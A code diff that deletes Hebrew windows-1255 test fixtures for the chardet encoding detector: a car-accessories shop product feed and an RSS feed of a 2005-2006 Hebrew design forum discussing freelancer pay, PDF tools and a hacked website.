http://www.carshops.co.il/products/339.html - http://www.carshops.co.il/products/339.html - - - - - <![CDATA[ספוילר לרכב 5 דלתות]]> - http://www.carshops.co.il/products/338.html - http://www.carshops.co.il/products/338.html - - - - - <![CDATA[ספוילר גבוה לרכב]]> - http://www.carshops.co.il/products/337.html - http://www.carshops.co.il/products/337.html - - - - - <![CDATA[זוג גבות לרכב בעיצוב אישי]]> - http://www.carshops.co.il/products/328.html - http://www.carshops.co.il/products/328.html - - - - - <![CDATA[קיט הנמכה KW) Weitec)]]> - http://www.carshops.co.il/products/326.html - http://www.carshops.co.il/products/326.html - - - - - <![CDATA[סט קפיצים אייבך]]> - http://www.carshops.co.il/products/325.html - http://www.carshops.co.il/products/325.html - - - - - <![CDATA[סט בולמים Bilstein]]> - http://www.carshops.co.il/products/324.html - http://www.carshops.co.il/products/324.html - - - - - <![CDATA[מראה מכנאית M3]]> - http://www.carshops.co.il/products/323.html - http://www.carshops.co.il/products/323.html - - - - - <![CDATA[Hardcore street]]> - http://www.carshops.co.il/products/322.html - http://www.carshops.co.il/products/322.html - - - - - <![CDATA[The worlds greatest rally cars]]> - http://www.carshops.co.il/products/321.html - http://www.carshops.co.il/products/321.html - - - - - <![CDATA[Extreme Driving]]> - http://www.carshops.co.il/products/320.html - http://www.carshops.co.il/products/320.html - - - - - <![CDATA[Porsche the legendary cars]]> - http://www.carshops.co.il/products/319.html - http://www.carshops.co.il/products/319.html - - - - - <![CDATA[The Worlds fastest cars]]> - http://www.carshops.co.il/products/318.html - http://www.carshops.co.il/products/318.html - - - - - <![CDATA[A nostalgic look at classic sport cars]]> - http://www.carshops.co.il/products/317.html - http://www.carshops.co.il/products/317.html - - - - - <![CDATA[Head On - Sportscars]]> - http://www.carshops.co.il/products/316.html - http://www.carshops.co.il/products/316.html - - - - - <![CDATA[Head On - Hot saloons & Hatchbacks]]> - http://www.carshops.co.il/products/315.html - http://www.carshops.co.il/products/315.html - - - - - <![CDATA[Getaway in Stockholm 4]]> - http://www.carshops.co.il/products/314.html - http://www.carshops.co.il/products/314.html - - - - - <![CDATA[Getaway in Stockholm 3]]> - http://www.carshops.co.il/products/313.html - http://www.carshops.co.il/products/313.html - - - - - <![CDATA[InCar 956]]> - http://www.carshops.co.il/products/312.html - http://www.carshops.co.il/products/312.html - - - - - <![CDATA[The greatest year of rallying 70's]]> - http://www.carshops.co.il/products/311.html - http://www.carshops.co.il/products/311.html - - - - - <![CDATA[The greatest year of rallying 80's]]> - http://www.carshops.co.il/products/310.html - http://www.carshops.co.il/products/310.html - - - - - <![CDATA[Mitsubishi Lancer EVO story]]> - http://www.carshops.co.il/products/309.html - http://www.carshops.co.il/products/309.html - - - - - <![CDATA[50 Years of Ferrari]]> - http://www.carshops.co.il/products/308.html - http://www.carshops.co.il/products/308.html - - - - - <![CDATA[Jeremy Clarkson - At full throttle]]> - http://www.carshops.co.il/products/307.html - http://www.carshops.co.il/products/307.html - - - - - <![CDATA[High Octane 2]]> - http://www.carshops.co.il/products/306.html - http://www.carshops.co.il/products/306.html - - - - - <![CDATA[PlantMax]]> - http://www.carshops.co.il/products/305.html - http://www.carshops.co.il/products/305.html - - - - - <![CDATA[קיט קרבון]]> - http://www.carshops.co.il/products/304.html - http://www.carshops.co.il/products/304.html - - - - - <![CDATA[קיט ראם-אייר]]> - http://www.carshops.co.il/products/303.html - http://www.carshops.co.il/products/303.html - - - - - <![CDATA[צ'יפ לרכב עם מנוע אטמוספרי עד שנת 95]]> - http://www.carshops.co.il/products/298.html - http://www.carshops.co.il/products/298.html - - - - - <![CDATA[צ'יפ לרכב עם מנוע אטמוספרי משנת ייצור 96]]> - http://www.carshops.co.il/products/297.html - http://www.carshops.co.il/products/297.html - - - - - <![CDATA[צ'יפ מנוע לרכב]]> - http://www.carshops.co.il/products/296.html - http://www.carshops.co.il/products/296.html - - - - - <![CDATA[אגזוז עם יציאה כפולה עגולה 101מ"מ.]]> - http://www.carshops.co.il/products/295.html - http://www.carshops.co.il/products/295.html - - - - - <![CDATA[אגזוז עם יציאה אובלית]]> - http://www.carshops.co.il/products/294.html - http://www.carshops.co.il/products/294.html - - - - - <![CDATA[אגזוז יציאה עגולה גדולה 114 מ"מ]]> - http://www.carshops.co.il/products/293.html - http://www.carshops.co.il/products/293.html - - - - - <![CDATA[אגזוז שתי יציאות מרובעות 86X65]]> - http://www.carshops.co.il/products/292.html - http://www.carshops.co.il/products/292.html - - - - - <![CDATA[אגזוז שתי יציאות מרובעות 95X75]]> - http://www.carshops.co.il/products/291.html - http://www.carshops.co.il/products/291.html - - - - - <![CDATA[ברגים להארכה]]> - http://www.carshops.co.il/products/290.html - http://www.carshops.co.il/products/290.html - - - - - <![CDATA[ספייסרים לגלגלים]]> - http://www.carshops.co.il/products/289.html - http://www.carshops.co.il/products/289.html - - - - - <![CDATA[זוג מראות חשמליות M3]]> - http://www.carshops.co.il/products/287.html - http://www.carshops.co.il/products/287.html - - - - - <![CDATA[שעון סל"ד 0-8000]]> - http://www.carshops.co.il/products/286.html - http://www.carshops.co.il/products/286.html - - - - - <![CDATA[שעון סל"ד 0-8000 אור תצוגה מתחלף]]> - http://www.carshops.co.il/products/285.html - http://www.carshops.co.il/products/285.html - - - - - <![CDATA[שעון טעינת מצבר אלקטרוני שחור]]> - http://www.carshops.co.il/products/284.html - http://www.carshops.co.il/products/284.html - - - - - <![CDATA[שעון טמפרטורת מים אלקטרוני שחור]]> - http://www.carshops.co.il/products/283.html - http://www.carshops.co.il/products/283.html - - - - - <![CDATA[שעון BOOST מכאני שחור]]> - http://www.carshops.co.il/products/282.html - http://www.carshops.co.il/products/282.html - - - - - <![CDATA[שעון טעינת מצבר אלקטרוני 60 מ"מ]]> - http://www.carshops.co.il/products/281.html - http://www.carshops.co.il/products/281.html - - - - - <![CDATA[שעון VACUUM מכאני 60 מ"מ]]> - http://www.carshops.co.il/products/280.html - http://www.carshops.co.il/products/280.html - - - - - <![CDATA[שעור טמפרטורת שמן אלקטרוני 60 מ"מ]]> - http://www.carshops.co.il/products/279.html - http://www.carshops.co.il/products/279.html - - - - - <![CDATA[שעור טמפרטורת מים אלקטרוני 60 מ"מ]]> - http://www.carshops.co.il/products/278.html - http://www.carshops.co.il/products/278.html - - - - - <![CDATA[שעון לחץ שמן אלקטרוני 60 מ"מ]]> - http://www.carshops.co.il/products/277.html - http://www.carshops.co.il/products/277.html - - - - - <![CDATA[שעון BOOST מכאני 60 מ"מ]]> - http://www.carshops.co.il/products/276.html - http://www.carshops.co.il/products/276.html - - - - - <![CDATA[שעון טעינת מצבר אלקטרוני]]> - http://www.carshops.co.il/products/275.html - http://www.carshops.co.il/products/275.html - - - - - <![CDATA[שעון טמפרטורת שמן אלקטרוני לבן]]> - http://www.carshops.co.il/products/274.html - http://www.carshops.co.il/products/274.html - - - - - <![CDATA[שעון טמפרטורת מים אלקטרוני לבן]]> - http://www.carshops.co.il/products/273.html - http://www.carshops.co.il/products/273.html - - - - - <![CDATA[שעון לחץ שמן אלקטרוני לבן]]> - http://www.carshops.co.il/products/272.html - http://www.carshops.co.il/products/272.html - - - - - <![CDATA[שעון טעינת מצבר אלקטרוני שחור]]> - http://www.carshops.co.il/products/271.html - http://www.carshops.co.il/products/271.html - - - - - <![CDATA[שעון טעינת מצבר אלקטרוני]]> - http://www.carshops.co.il/products/270.html - http://www.carshops.co.il/products/270.html - - - - - <![CDATA[שעון Vacuum מכאני]]> - http://www.carshops.co.il/products/269.html - http://www.carshops.co.il/products/269.html - - - - - <![CDATA[שען טמפרטורת שמן אלקטרוני שחור]]> - http://www.carshops.co.il/products/268.html - http://www.carshops.co.il/products/268.html - - - - - <![CDATA[שעון טמפרטורת שמן אלקטרוני]]> - http://www.carshops.co.il/products/267.html - http://www.carshops.co.il/products/267.html - - - - - <![CDATA[שעון טמפרטורת מים אלקטרוני]]> - http://www.carshops.co.il/products/266.html - http://www.carshops.co.il/products/266.html - - - - - <![CDATA[שעון לחץ שמן אלקטרוני שחור]]> - http://www.carshops.co.il/products/265.html - http://www.carshops.co.il/products/265.html - - - - - <![CDATA[שעון Boost מכאני שחור]]> - http://www.carshops.co.il/products/264.html - http://www.carshops.co.il/products/264.html - - - - - <![CDATA[שעון לחץ שמן אלקטרוני לבן]]> - http://www.carshops.co.il/products/263.html - http://www.carshops.co.il/products/263.html - - - - - <![CDATA[שעון Boost תצוגה ב-PSI]]> - http://www.carshops.co.il/products/262.html - http://www.carshops.co.il/products/262.html - - - - - <![CDATA[שעון Boost תצוגה ב-BAR]]> - http://www.carshops.co.il/products/261.html - http://www.carshops.co.il/products/261.html - - - - - <![CDATA[שעון Boost תצוגה ב-PSI אור מתחלף]]> - http://www.carshops.co.il/products/260.html - http://www.carshops.co.il/products/260.html - - - - - <![CDATA[שעון Boost תצוגה ב-BAR אור מתחלף]]> - http://www.carshops.co.il/products/259.html - http://www.carshops.co.il/products/259.html - - - - - <![CDATA[שעון Boost תצוגה ב-BAR]]> - http://www.carshops.co.il/products/258.html - http://www.carshops.co.il/products/258.html - - - - - <![CDATA[שעון Boost תצוגה ב-PSI]]> - http://www.carshops.co.il/products/257.html - http://www.carshops.co.il/products/257.html - - - - - <![CDATA[שעון Boost תצוגה ב-PSI]]> - http://www.carshops.co.il/products/256.html - http://www.carshops.co.il/products/256.html - - - - - <![CDATA[שעון Boost תצוגה ב-BAR]]> - http://www.carshops.co.il/products/255.html - http://www.carshops.co.il/products/255.html - - - - - <![CDATA[שעון Boost תצוגה ב-PSI]]> - http://www.carshops.co.il/products/254.html - http://www.carshops.co.il/products/254.html - - - - - <![CDATA[שעון סל"ד עם אור אחורי]]> - http://www.carshops.co.il/products/253.html - http://www.carshops.co.il/products/253.html - - - - - <![CDATA[שעון סל"ד עם אור החלפת הילוך]]> - http://www.carshops.co.il/products/252.html - http://www.carshops.co.il/products/252.html - - - - - <![CDATA[כבלי הצתה]]> - http://www.carshops.co.il/products/251.html - http://www.carshops.co.il/products/251.html - - - - - <![CDATA[פלגים (מצתים) פלטיניום]]> - http://www.carshops.co.il/products/250.html - http://www.carshops.co.il/products/250.html - - - - - <![CDATA[קפיצי הנמכה Mad]]> - http://www.carshops.co.il/products/247.html - http://www.carshops.co.il/products/247.html - - - - - <![CDATA[בולמי KONI]]> - http://www.carshops.co.il/products/246.html - http://www.carshops.co.il/products/246.html - - - - - <![CDATA[כסא Ronco]]> - http://www.carshops.co.il/products/245.html - http://www.carshops.co.il/products/245.html - - - - - <![CDATA[כסא Comfort]]> - http://www.carshops.co.il/products/244.html - http://www.carshops.co.il/products/244.html - - - - - <![CDATA[מטף CAB318]]> - http://www.carshops.co.il/products/243.html - http://www.carshops.co.il/products/243.html - - - - - <![CDATA[מטף CAB316]]> - http://www.carshops.co.il/products/242.html - http://www.carshops.co.il/products/242.html - - - - - <![CDATA[מערכת כיבוי אש מכאנית]]> - http://www.carshops.co.il/products/241.html - http://www.carshops.co.il/products/241.html - - - - - <![CDATA[מערכת כיבוי אש חשמלית 2]]> - http://www.carshops.co.il/products/240.html - http://www.carshops.co.il/products/240.html - - - - - <![CDATA[מערכת כיבוי אש חשמלית 1]]> - http://www.carshops.co.il/products/239.html - http://www.carshops.co.il/products/239.html - - - - - <![CDATA[דיסק בלימה ספורט ושיפורים]]> - http://www.carshops.co.il/products/236.html - http://www.carshops.co.il/products/236.html - - - - - <![CDATA[רפידות בלם OMP]]> - http://www.carshops.co.il/products/235.html - http://www.carshops.co.il/products/235.html - - - - - <![CDATA[אגזוז אוניברסלי סיומת כפולה OMP]]> - http://www.carshops.co.il/products/234.html - http://www.carshops.co.il/products/234.html - - - - - <![CDATA[אגזוז אוניברסלי סיומת עגולה OMP]]> - http://www.carshops.co.il/products/233.html - http://www.carshops.co.il/products/233.html - - - - - <![CDATA[אגזוזים מבית OMP]]> - http://www.carshops.co.il/products/232.html - http://www.carshops.co.il/products/232.html - - - - - <![CDATA[פילטר אויר OMP]]> - http://www.carshops.co.il/products/231.html - http://www.carshops.co.il/products/231.html - - - - - <![CDATA[דוושות OA1020]]> - http://www.carshops.co.il/products/230.html - http://www.carshops.co.il/products/230.html - - - - - <![CDATA[דוושות OA1070]]> - http://www.carshops.co.il/products/229.html - http://www.carshops.co.il/products/229.html - - - - - <![CDATA[דוושות Color]]> - http://www.carshops.co.il/products/228.html - http://www.carshops.co.il/products/228.html - - - - - <![CDATA[דוושות Top F1]]> - http://www.carshops.co.il/products/227.html - http://www.carshops.co.il/products/227.html - - - - - <![CDATA[דוושות אוטומט 2]]> - http://www.carshops.co.il/products/226.html - http://www.carshops.co.il/products/226.html - - - - - <![CDATA[דוושות אוטומט]]> - http://www.carshops.co.il/products/225.html - http://www.carshops.co.il/products/225.html - - - - - <![CDATA[ידית הילוכים ODA2000]]> - http://www.carshops.co.il/products/224.html - http://www.carshops.co.il/products/224.html - - - - - <![CDATA[ידית הילוכים Ring]]> - http://www.carshops.co.il/products/223.html - http://www.carshops.co.il/products/223.html - - - - - <![CDATA[ידית הילוכים Vega]]> - http://www.carshops.co.il/products/222.html - http://www.carshops.co.il/products/222.html - - - - - <![CDATA[ידית הילוכים Mercury]]> - http://www.carshops.co.il/products/221.html - http://www.carshops.co.il/products/221.html - - - - - <![CDATA[ידית הילוכים Gemini]]> - http://www.carshops.co.il/products/220.html - http://www.carshops.co.il/products/220.html - - - - - <![CDATA[ידית הילוכים Venus]]> - http://www.carshops.co.il/products/219.html - http://www.carshops.co.il/products/219.html - - - - - <![CDATA[ידית הילוכים Mars]]> - http://www.carshops.co.il/products/218.html - http://www.carshops.co.il/products/218.html - - - - - <![CDATA[ידית הילוכים Neptune]]> - http://www.carshops.co.il/products/217.html - http://www.carshops.co.il/products/217.html - - - - - <![CDATA[מרחיק הגה]]> - http://www.carshops.co.il/products/216.html - http://www.carshops.co.il/products/216.html - - - - - <![CDATA[הגה Quadro]]> - http://www.carshops.co.il/products/215.html - http://www.carshops.co.il/products/215.html - - - - - <![CDATA[הגה Quadro 04]]> - http://www.carshops.co.il/products/214.html - http://www.carshops.co.il/products/214.html - - - - - <![CDATA[הגה Racing GP]]> - http://www.carshops.co.il/products/213.html - http://www.carshops.co.il/products/213.html - - - - - <![CDATA[הגה Targa 04]]> - http://www.carshops.co.il/products/212.html - http://www.carshops.co.il/products/212.html - - - - - <![CDATA[הגה Velocita 04]]> - http://www.carshops.co.il/products/211.html - http://www.carshops.co.il/products/211.html - - - - - <![CDATA[זוג ריפודים לחגורה 2"]]> - http://www.carshops.co.il/products/210.html - http://www.carshops.co.il/products/210.html - - - - - <![CDATA[זוג ריפודים לחגורה 2"]]> - http://www.carshops.co.il/products/209.html - http://www.carshops.co.il/products/209.html - - - - - <![CDATA[חגורת 3 נק' OMP]]> - http://www.carshops.co.il/products/208.html - http://www.carshops.co.il/products/208.html - - - - - <![CDATA[חגורת 4 נק' OMP]]> - http://www.carshops.co.il/products/207.html - http://www.carshops.co.il/products/207.html - - - - - <![CDATA[כסא Ronco Tuning]]> - http://www.carshops.co.il/products/206.html - http://www.carshops.co.il/products/206.html - - - - - <![CDATA[כסא Comfort 05]]> - http://www.carshops.co.il/products/205.html - http://www.carshops.co.il/products/205.html - - - - - <![CDATA[כסא Comfort Lusso]]> - http://www.carshops.co.il/products/204.html - http://www.carshops.co.il/products/204.html - - - - - <![CDATA[כפפות SPORT]]> - http://www.carshops.co.il/products/203.html - http://www.carshops.co.il/products/203.html - - - - - <![CDATA[תיק צד קטן, לנווט OMP]]> - http://www.carshops.co.il/products/202.html - http://www.carshops.co.il/products/202.html - - - - - <![CDATA[תיק צד סטודנטים OMP]]> - http://www.carshops.co.il/products/201.html - http://www.carshops.co.il/products/201.html - - - - - <![CDATA[חומר ניקוי לגלגלים]]> - http://www.carshops.co.il/products/199.html - http://www.carshops.co.il/products/199.html - - - - - <![CDATA[צבע עמיד בחום]]> - http://www.carshops.co.il/products/198.html - http://www.carshops.co.il/products/198.html - - - - - <![CDATA[תיק נשיאה לקסדה]]> - http://www.carshops.co.il/products/197.html - http://www.carshops.co.il/products/197.html - - - - - <![CDATA[קסדת Formula 4]]> - http://www.carshops.co.il/products/196.html - http://www.carshops.co.il/products/196.html - - - - - <![CDATA[תוספות לקסדת Fornula Carbon]]> - http://www.carshops.co.il/products/195.html - http://www.carshops.co.il/products/195.html - - - - - <![CDATA[קסדת Formula Carbon]]> - http://www.carshops.co.il/products/194.html - http://www.carshops.co.il/products/194.html - - - - - <![CDATA[מגן צלעות]]> - http://www.carshops.co.il/products/193.html - http://www.carshops.co.il/products/193.html - - - - - <![CDATA[נעלי Corsa]]> - http://www.carshops.co.il/products/192.html - http://www.carshops.co.il/products/192.html - - - - - <![CDATA[נעלי racing]]> - http://www.carshops.co.il/products/191.html - http://www.carshops.co.il/products/191.html - - - - - <![CDATA[נעלי competizione]]> - http://www.carshops.co.il/products/190.html - http://www.carshops.co.il/products/190.html - - - - - <![CDATA[כפפות לנהג Base]]> - http://www.carshops.co.il/products/189.html - http://www.carshops.co.il/products/189.html - - - - - <![CDATA[כפפות לנהג Maestro]]> - http://www.carshops.co.il/products/188.html - http://www.carshops.co.il/products/188.html - - - - - <![CDATA[כפפות מכונאי]]> - http://www.carshops.co.il/products/187.html - http://www.carshops.co.il/products/187.html - - - - - <![CDATA[כפפות מכונאי מקצועיות]]> - http://www.carshops.co.il/products/186.html - http://www.carshops.co.il/products/186.html - - - - - <![CDATA[כפפות מכונאי נגד אש]]> - http://www.carshops.co.il/products/185.html - http://www.carshops.co.il/products/185.html - - - - - <![CDATA[תיק כלים מקצועי]]> - http://www.carshops.co.il/products/184.html - http://www.carshops.co.il/products/184.html - - - - - <![CDATA[מסכת ראש פתוחה]]> - http://www.carshops.co.il/products/183.html - http://www.carshops.co.il/products/183.html - - - - - <![CDATA[מסכת ראש]]> - http://www.carshops.co.il/products/182.html - http://www.carshops.co.il/products/182.html - - - - - <![CDATA[מגני מרפקים לנהג]]> - http://www.carshops.co.il/products/181.html - http://www.carshops.co.il/products/181.html - - - - - <![CDATA[חליפת מרוץ לילדים Baby F1]]> - http://www.carshops.co.il/products/180.html - http://www.carshops.co.il/products/180.html - - - - - <![CDATA[חליפת מרוץ נוער ומבוגרים PilotaKart]]> - http://www.carshops.co.il/products/179.html - http://www.carshops.co.il/products/179.html - - - - - <![CDATA[חליפת מרוץ Arrow]]> - http://www.carshops.co.il/products/178.html - http://www.carshops.co.il/products/178.html - - - - - <![CDATA[חליפה מקצועית MasterKart]]> - http://www.carshops.co.il/products/177.html - http://www.carshops.co.il/products/177.html - - - - - <![CDATA[חליפת נהיגה לקארטינג Tecnica]]> - http://www.carshops.co.il/products/176.html - http://www.carshops.co.il/products/176.html - - - - - <![CDATA[מושב באקט ספורטיבי דגם 644]]> - http://www.carshops.co.il/products/166.html - http://www.carshops.co.il/products/166.html - - - - - <![CDATA[פילטר אויר פתוח AKA]]> - http://www.carshops.co.il/products/92.html - http://www.carshops.co.il/products/92.html - - - - - <![CDATA[גופיות לכסאות - עלה ירוק על אפור]]> - http://www.carshops.co.il/products/88.html - http://www.carshops.co.il/products/88.html - - - - - <![CDATA[גופיות לכסאות - עלה ירוק על לבן]]> - http://www.carshops.co.il/products/87.html - http://www.carshops.co.il/products/87.html - - - - - <![CDATA[גופיות לכסאות - קעקוע אדום]]> - http://www.carshops.co.il/products/86.html - http://www.carshops.co.il/products/86.html - - - - - <![CDATA[גופיות לכסאות - קעקוע צהוב]]> - http://www.carshops.co.il/products/85.html - http://www.carshops.co.il/products/85.html - - - - - <![CDATA[סט משטחי אלומניום]]> - http://www.carshops.co.il/products/82.html - http://www.carshops.co.il/products/82.html - - - - - <![CDATA[מסכה אחורית לרכב בעיצוב אישי]]> - http://www.carshops.co.il/products/67.html - http://www.carshops.co.il/products/67.html - - - - - <![CDATA[מסכה קדמית בעיצוב אישי]]> - http://www.carshops.co.il/products/63.html - http://www.carshops.co.il/products/63.html - - - - - <![CDATA[קורס נהיגת ראלי בצרפת]]> - http://www.carshops.co.il/products/34.html - http://www.carshops.co.il/products/34.html - - - - - <![CDATA[התנסות בנהיגת מרוצים]]> - http://www.carshops.co.il/products/33.html - http://www.carshops.co.il/products/33.html - - - - - <![CDATA[חבילה של נהיגה מתקדמת + כרישים]]> - http://www.carshops.co.il/products/32.html - http://www.carshops.co.il/products/32.html - - - - - <![CDATA[קורס כרישים]]> - http://www.carshops.co.il/products/31.html - http://www.carshops.co.il/products/31.html - - - - - <![CDATA[קורס נהיגה מתקדמת]]> - http://www.carshops.co.il/products/30.html - http://www.carshops.co.il/products/30.html - - - - - \ No newline at end of file diff --git a/chardet/tests/windows-1255-hebrew/exego.net.2.xml b/chardet/tests/windows-1255-hebrew/exego.net.2.xml deleted file mode 100644 index bb55d70..0000000 --- a/chardet/tests/windows-1255-hebrew/exego.net.2.xml +++ /dev/null @@ -1,49 +0,0 @@ - - -heConcept Magazinejordan@exego.netהפורום של קונספציהhttp://www.exego.net/forums/All.asp?f=2מחפשים עבודה בלוח הדרושיםoink invites / יותם הדריותם הדרoink inviteshttp://www.exego.net/forums/showMessage.asp?i=16495<div dir="rtl" style="width:100%">יש לי הזמנה או 2 לאוינק ( <a href="http://oink.me.uk" target="_blank">http://oink.me.uk</a> )<br> -אם מישהו עם אוסף מוזיקה מכובד ונכונות לשמור על ratio של 1:1 לפחות מעוניין בהזמנה, שישאיר פה מייל.</div>2006-01-04T16:27:00+02:00זו בדיוק הנקודה. / FayFayמה מגיע למי ולמה?http://www.exego.net/forums/showMessage.asp?i=16494<div dir="rtl" style="width:100%">בגלל זה להפוך עבודה של 3 חודשים לג'סטה ידידותית, נשמע לי קצת מעוות. </div>2006-01-04T15:54:00+02:00החוזה אמור לסדר / ירדןירדןמה מגיע למי ולמה?http://www.exego.net/forums/showMessage.asp?i=16492<div dir="rtl" style="width:100%">תשלום עבור עבודה. לא תשלום עבור הצגה באינטרנט. לכן אם בסופו של דבר שטראוס לא רוצה להשתמש בפרסומת שצולמה עבורה, הצלם יקבל תשלום בכל מקרה.</div>2006-01-04T14:57:00+02:00אני מסכימה איתך.... / FayFayמה מגיע למי ולמה?http://www.exego.net/forums/showMessage.asp?i=16487<div dir="rtl" style="width:100%">בגדול - אני מסכימה. ראשית כל - &quot;אל תהרוג את השליח&quot;, הרי שלא מדובר בי, אבל אלה מקרים שקורים מדי יום. סה&quot;כ גם לי אין תשובות מובהקות לזה.<br> -אין מה לעשות - לא מעט סטודנטים עובדים ככה, נכווים ולומדים מהנסיון הלאה.<br> -העניין הוא שזה באמת עניין בעייתי. פרינציפיאלית. השאלה הייתה מכוונת גם למקרים בהם עובדים עם חשבונית, בצורה חוקית ונקייה...<br> -השאלה היא האם כשמסוכם שכר X, והעבודה נעשית ולא מיושמת בסופו של דבר (גם אם הלקוח בוחר לעשות ממנה טפטים לשירותים במקום לשחרר אותה לשוק) - מה דין התשלום למעצב?<br> -זו השאלה.<br> -</div>2006-01-04T12:10:00+02:00שכח מהכסף, לא תראה ממנו עוד שקל אחד / אמיראמירמה מגיע למי ולמה?http://www.exego.net/forums/showMessage.asp?i=16486<div dir="rtl" style="width:100%">ככה זה כשעובדים בשחור. אני מקווה שלמדת מהנסיון ועד הג'וב הבא תפתח תיק במס הכנסה.<br> -אני ממליץ לך שלא לפנות לבית משפט מאחר ועברת על חוקי המדינה בדיוק כמו הלקוח שלך.</div>2006-01-04T10:03:00+02:00מה מגיע למי ולמה? / FayFayמה מגיע למי ולמה?http://www.exego.net/forums/showMessage.asp?i=16483<div dir="rtl" style="width:100%">שלום לכל הנוכחים<br> -יש לי שאלה בנוגע לשכר של פרחלאנסרים, שעובדים ללא חשבונית/קבלה. האמת שביקשו את דעתי בנושא, ולא היה לי שמץ של מושג מה נהוג לעשות במקרים מהסוג הזה, ולהלן הקושיה:<br> -פרילנסר חותם על הסכם עבדוה מול חברה. התשלום נעשה בשחור, וזה מוסכם על 2 הצדדים. המעצב משקיע כ-3 חודשים של עבודה על פרוייקט מיתוג רחב, ובסופו של דבר הבוס הגדול לוקי אך ורק את הלוגו + הסלוגן, ובונה את שאר הממשקים בכוחות עצמו. המעצב מתעדכן בכך רק כשהוא רואה את המוצר הסופי, ולא ממש מזהה את ה'ילד' שלו. הבוס משלם למעצב אך ורק על הלוגו, כשהחוזה המקורי עומד על סכום משולש מזה. הטענה היא - לא השתמשנו בחומרים שלך, ועל מה שלקחנו - שילמנו. הנושא לא הוזכר בחוזה, והעניין עומד בסימן שאלה מעיק, מה על המעצב לעשות הלאה?<br> -אני לא ידעתי בדיוק מה הפרוצדורה במקרים האלה. המלצתי, במידת הצורך, להפעיל שיטות משפטיות, מאחר שבכל זאת יש חוזה חתום. <br> -אם יש למישהו רעיון קצת יותר יצירתי ומוצלח, אשמח לשמוע, כי הבחור מתוסכל ומבולבל, ולא ממש מובן לאן פניו מועדות....<br> -זהו להפעם.<br> -שיהיה לכולכם יום נפלא, ותודה מראש!</div>2006-01-03T17:06:00+02:00שאלה לעוזרים / udisudisשאלה לעוזריםhttp://www.exego.net/forums/showMessage.asp?i=16477<div dir="rtl" style="width:100%">יש הסבר כלשהו לזה שכל הפרטים האישיים וכו', ירדו באתר שלי למטה? או יותר נכון נפלו?<br> -הרשימות הקודמות שלי נשארו אותו דבר, אבל גם האתר הראשי שלי, קיבל צניחה בצד ימין.<br> -תודה<br><a href="http://www.notes.co.il/sharabani/15575.asp">http://www.notes.co.il/sharabani/15575.asp</a></div>2005-12-30T15:18:00+02:00זוכר משהו מהאתר? עבודה אחרת? / יותם הדריותם הדראיך קוראים לסטודיו...?http://www.exego.net/forums/showMessage.asp?i=16473<div dir="rtl" style="width:100%"></div>2005-12-30T13:40:00+02:00בקשר לפתרונות חופשיים / יותם הדריותם הדרמישהו יודע מה ההבדל ביןhttp://www.exego.net/forums/showMessage.asp?i=16472<div dir="rtl" style="width:100%">אני שמעתי דברים טובים על PDF995 -<br> -<a href="http://www.pdf995.com/" target="_blank">http://www.pdf995.com/</a><br> -<br> -אני מניח שזה פתרון טוב למקרים שציינת, בעיקר אם מדובר ב-PDFים למסך או להדפסה מקומית בלייזר/אינקג'ט. כעקרון אני יודע שמוצרים שלא מבית אדובי לא מומלצים במקרים של עבודה לדפוס, כי הם לא מדברים &quot;אקרובטית&quot; ב-100%, וכמובן חסרים בהם הפיצ'רים המתקדמים של הגרסאות המאוחרות של אקרובט.</div>2005-12-30T11:20:00+02:00יש המון אפשרויות חינמיות / קיפושקיפושמישהו יודע מה ההבדל ביןhttp://www.exego.net/forums/showMessage.asp?i=16471<div dir="rtl" style="width:100%">שיוצרות מדפסת חדשה אליה אתה שולח את הקובץ והיא יוצרת PDF<br> -נסה לחפש PDF CRERATOR</div>2005-12-30T09:27:00+02:00גם לי קרה משהו כזה / ירדןירדןחוטף מכות ורץ לספר לחבר'הhttp://www.exego.net/forums/showMessage.asp?i=16470<div dir="rtl" style="width:100%">יש אתר שהתקנתי בו וורדפרס 1.2, האתר די סטאטי אבל לאחרונה מישהו התחיל להפציץ אותו באלפי טוקבאקים. לצערי אין לי את הססמה כי זה לא האתר שלי, כך שאני לא יכול לחסום את זה...<br> -<br> -מדובר בבעיה שנפתרה בגרסאות מאוחרות יותר של וורדפרס, וחבל.</div>2005-12-30T08:27:00+02:00חוטף מכות ורץ לספר לחבר'ה / חנן כהןחנן כהןחוטף מכות ורץ לספר לחבר'הhttp://www.exego.net/forums/showMessage.asp?i=16469<div dir="rtl" style="width:100%">מאמר שבו אני מספר על הפריצה לאתר שלי שהיתה השבוע.<br> -<br> -<a href="http://info.org.il/page.php/owned" target="_blank">http://info.org.il/page.php/owned</a><br> -<br> -ילדים, היזהרו מהבאובבים.</div>2005-12-29T23:56:00+02:00הם טובים, אבל לא אליהם התכוונתי... / amitay7amitay7איך קוראים לסטודיו...?http://www.exego.net/forums/showMessage.asp?i=16468<div dir="rtl" style="width:100%">מישהו?</div>2005-12-29T22:21:00+02:00kלא מכיר את הפתיח הזה / mattymattyאיך קוראים לסטודיו...?http://www.exego.net/forums/showMessage.asp?i=16467<div dir="rtl" style="width:100%">אבל ניחוש - אולי eyeballnyc ?</div>2005-12-29T20:19:00+02:00אבל נניח שמישהו רוצה את זה רק בכדי / ירדןירדןמישהו יודע מה ההבדל ביןhttp://www.exego.net/forums/showMessage.asp?i=16466<div dir="rtl" style="width:100%">לעשות גרסאות PDF של מסמכי וורד או פאאורפוינט, בלי כל מני פיצ'רים מתקדמים.<br> -<br> -אני יודע שאופן אופיס עושה את זה. יש כלים אחרים?</div>2005-12-29T18:42:00+02:00גם אני שאלתי את עצמי / יותם הדריותם הדרמישהו יודע מה ההבדל ביןhttp://www.exego.net/forums/showMessage.asp?i=16465<div dir="rtl" style="width:100%">אני זוכר שבזמנו מצאתי כמה חצאי תשובות באתר של קרטסופט - למשל האפשרות ליצור קובץ PDF עם טקסט עברי חי ותקין - כזה שמאפשר תיקון וחיפוש למשל - אבל לא הצלחתי למצוא את ה-url הספציפי כרגע - האתר שלהם מבולגן מאוד.<br> -אולי זו התחלה: <a href="http://www.karatsoft.co.il/site/NewsPage.asp?ID=92&amp;type=N" target="_blank">http://www.karatsoft.co.il/site/NewsPage.asp?ID=92&amp;type=N</a> ו- <br> -ואם לא - אולי שווה לברר במייל/טלפון או באחד הפורומים (תםוז/שריג) בהם מסתובבים נציגים מהחברה.<br> -<br> -בזמן כתיבת ההודעה מצאתי את זה:<br> -<a href="http://www.karatsoft.co.il/site/NewsPage.asp?ID=22&amp;type=A" target="_blank">http://www.karatsoft.co.il/site/NewsPage.asp?ID=22&amp;type=A</a><br> -<a href="http://www.karatsoft.co.il/site/NewsPage.asp?ID=6&amp;type=A" 